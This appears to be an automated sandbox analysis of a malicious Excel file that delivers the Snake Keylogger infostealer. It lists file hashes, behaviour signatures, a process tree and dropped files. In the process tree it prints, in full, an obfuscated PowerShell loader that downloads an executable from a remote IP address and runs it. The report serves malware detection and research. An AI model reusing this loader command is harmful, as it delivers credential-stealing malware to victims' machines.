Analysis

  • max time kernel
    122s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    30-09-2024 09:28

General

  • Target

    SYSN ORDER.xls

  • Size

    641KB

  • MD5

    673bd0aa988ca4a1ef05edb3d5b68d60

  • SHA1

    4b7d31c4d6a4cd94e95fdd7c35bca86f6e13ec38

  • SHA256

    9db5ab81cbe373ea471f128ad2fdc98c9eb98c1ff3991046f7ca54823d9a6107

  • SHA512

    0af25507fd68eb9e8a9df4b1a93f6fad31429d0c0d37d326482ace999f5859f18ef3521c7e71146f41afcf45e7bbaf0d1d77543cc8abfb9c38ac2057cca9929c

  • SSDEEP

    12288:GOyBFRSc/ol3o3+io8tM7qgSwaY0c6bde1bmnyqkZH1:GTBShxE+iokM7qgadcgdwmlkZ

Malware Config

Extracted

Family

snakekeylogger

Credentials

Signatures

  • Snake Keylogger

    Keylogger and Infostealer first seen in November 2020.

  • Snake Keylogger payload 4 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Evasion via Device Credential Deployment 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 32 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\SYSN ORDER.xls"
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:2692
  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe -Embedding
    1⤵
    • Blocklisted process makes network request
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2552
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" "/C POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2908
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))"
        3⤵
        • Blocklisted process makes network request
        • Evasion via Device Credential Deployment
        • Loads dropped DLL
        • Drops file in System32 directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2392
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3jimymcx.cmdline"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1396
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
            C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFF75.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCFF74.tmp"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:1588
        • C:\Users\Admin\AppData\Roaming\dllhost.exe
          "C:\Users\Admin\AppData\Roaming\dllhost.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:1160
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            "C:\Users\Admin\AppData\Roaming\dllhost.exe"
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2952
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2952 -s 972
              6⤵
              • Program crash
              PID:2208

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

    Filesize

    1KB

    MD5

    7fb5fa1534dcf77f2125b2403b30a0ee

    SHA1

    365d96812a69ac0a4611ea4b70a3f306576cc3ea

    SHA256

    33a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f

    SHA512

    a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

    Filesize

    436B

    MD5

    971c514f84bba0785f80aa1c23edfd79

    SHA1

    732acea710a87530c6b08ecdf32a110d254a54c8

    SHA256

    f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

    SHA512

    43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

    Filesize

    174B

    MD5

    92f93792ea806d178383cb9c70bd2e26

    SHA1

    ee610cb7611dff0649dab886e78b24f06ea8824c

    SHA256

    c9503873ee79df3e9097d50783c0a3ad0eb843bff50444b6c9551d8cef86e1e2

    SHA512

    c78d97b8633618d6b7a20700ce2db9897646ea10954d088efa2a934274a8c9e3b868ffe6491440ae3817116a12e84e32c533b6dc3f21074743f7507322f1dcf3

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    b43ec613852f55aa35ff7debd7323764

    SHA1

    9798c4022472cf98819cfbcd9f4a12c557bdb987

    SHA256

    e0a3df2aa68aab1f41ef3ae693cc41e66986d9e83f7efa9e7d8ebea811ab6c49

    SHA512

    d8004df4ec4950b46a62be2df37bbb24082414dfdcd2a4df52d4cb950bc4cabed1d96a9fba4d393c4e26a44cbde0a2d391b0d0579c0311f56008416259e00471

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

    Filesize

    170B

    MD5

    e71bf94794c3a3c80ea8531c16ec988b

    SHA1

    f2a9a0c156788922f86b9008b0aa0c525afecd91

    SHA256

    f3ee403d79ea6f3fa638b3fe5c46889ec785a0240786349144544921dcf94539

    SHA512

    28841ec796f18b794a89cbb2f51ec3f14ba150b00155561764362c43348e2a4c1d9425ff7163dfbbe4072e6f261b621b23a2a51b1418375ce73b066660701974

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\AS91FDNI\IEnetbokkworkingforupdate[1].hta

    Filesize

    8KB

    MD5

    a63beaf7df124ec89423ccb526998fc1

    SHA1

    397e973479a8e70b3ea6cea2c5a6f4d796364f40

    SHA256

    2e07806ea40e3109f56707486bdb89ba38b7854ea97b988be7dcc9c77a4d2c20

    SHA512

    603d03c65f5c62093bc217b084120d8bf0dcd801d8cc6415f2acaa9ceaeac2e433dfd91383835a7532f29652d69ef801f662f913c0d2518629170d9338889c62

  • C:\Users\Admin\AppData\Local\Temp\3jimymcx.dll

    Filesize

    3KB

    MD5

    41d485ca66acf46399fbd47df0da0170

    SHA1

    9c099baf2fc99a8a3bd895c9c6234ff8d1fa8661

    SHA256

    066c2967ec959f80d2d166e7a1a41053c5a051b4eef3984c0bbc78ecf9c74750

    SHA512

    6495827ab4d74d4ba95681a69e12192004bd64064aef81bb1ad6fe6427103a9f11425cab365315655355a82dd7b271450935afe521c8ddd854281368df6bf6e0

  • C:\Users\Admin\AppData\Local\Temp\3jimymcx.pdb

    Filesize

    7KB

    MD5

    7d5700e78f5ae1bba4303e2907d33363

    SHA1

    ba695a0017bcf9d8eb6e8a10d42d06e11599ef25

    SHA256

    9b697aad10a5fcd670b99df0b23df9a7247a6c57b6f5479cf7dd474d5512af63

    SHA512

    503405dac9f273144ae747ac49103fb4405498af204b9f85c951813bbbffd6453f3c90c7e00f1bf86cef7a5f4b4e4598b2e799b09136191f2af6eeb05537fc08

  • C:\Users\Admin\AppData\Local\Temp\CabF5C4.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\RESFF75.tmp

    Filesize

    1KB

    MD5

    47c974031c21e6895694eb4bd5eeb77f

    SHA1

    eceac48583554483e41c39645753e53ed29f186f

    SHA256

    14000240b6a4528b73a7545addceaebd4b8e0aa21a19616be07cdecb27929a85

    SHA512

    5d7bd4c77971cfc00e5c6e266b9af712dd8856da203e4e8042219180e731b315ec91cda62bebf496e4a4e754f1b609628a42cca1f4db45f7f8421b302d94f00c

  • C:\Users\Admin\AppData\Roaming\dllhost.exe

    Filesize

    1004KB

    MD5

    7f0098dcc054a27f80296adf300573ec

    SHA1

    94bd05a8f7b8b79750025d0e9b6407beb2b85c89

    SHA256

    468981a4e110bca0fa99eb08c2fbda0e1482cf8ef5fbb3adcf82db6609aede24

    SHA512

    904adfade566e1404d1d07ec1eb6141e06abdc0b74a803946294124f485f7260de2cbdde32f2abaaa96c0c25f3b476d39887502d5f304b3bc346d314119b1d77

  • \??\c:\Users\Admin\AppData\Local\Temp\3jimymcx.0.cs

    Filesize

    474B

    MD5

    006d2bdbc05adf8dd13c8c672f8d8bdf

    SHA1

    63a2f1d74d732f474251c0278f91df47e3872caf

    SHA256

    979007d0b68b1e466e58daec48283b65d3778cfdae6a40819309d85f0f624a96

    SHA512

    762fef864ad0ff9a168b6925934af3b6b90b0c053da6a62efec831ae9fd2fe54de935851178ec658937b316c2218e79f2d2c49a0c5a84478cdd662c6d72b47ea

  • \??\c:\Users\Admin\AppData\Local\Temp\3jimymcx.cmdline

    Filesize

    309B

    MD5

    2c5a24b6417fef3214ac0cf05cde78da

    SHA1

    96070af6b81b23b83b789acdef8c13cef8fdf710

    SHA256

    b6aa9dbb6ddaf0590b20ca87584a00db2befd20df8a17db57ee62b40ad8c83c0

    SHA512

    ef13a8ea44239cb7008431386bd87e0db021b2e2c2dba28ff5abba8a8c010f0e8d6742fed5dda132066a460f43122e64508e190d5fd66e21873da0f6d6f7317b

  • \??\c:\Users\Admin\AppData\Local\Temp\CSCFF74.tmp

    Filesize

    652B

    MD5

    a2ad4911c244e02e86a7de70c59ed2ca

    SHA1

    7fad0f60417dc3041654bf56db258ff4d3f2bfe7

    SHA256

    371c2be9f4d8194232c73b511e0269fca19a8625a75a9753f73ee766d54ebf09

    SHA512

    67ac47cf7ed6e70145506a860c1895de6af7c5bd72e3fc1b9c51db89c380accec6f6d62f12b8d08936e270db2c3cb2a11d1733a2ef4760b0e618411f6bfb2485

  • memory/2552-18-0x0000000002110000-0x0000000002112000-memory.dmp

    Filesize

    8KB

  • memory/2692-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2692-19-0x00000000023A0000-0x00000000023A2000-memory.dmp

    Filesize

    8KB

  • memory/2692-1-0x000000007231D000-0x0000000072328000-memory.dmp

    Filesize

    44KB

  • memory/2692-65-0x000000007231D000-0x0000000072328000-memory.dmp

    Filesize

    44KB

  • memory/2952-67-0x0000000000090000-0x00000000000B6000-memory.dmp

    Filesize

    152KB

  • memory/2952-72-0x0000000000090000-0x00000000000B6000-memory.dmp

    Filesize

    152KB

  • memory/2952-75-0x0000000000090000-0x00000000000B6000-memory.dmp

    Filesize

    152KB

  • memory/2952-68-0x0000000000090000-0x00000000000B6000-memory.dmp

    Filesize

    152KB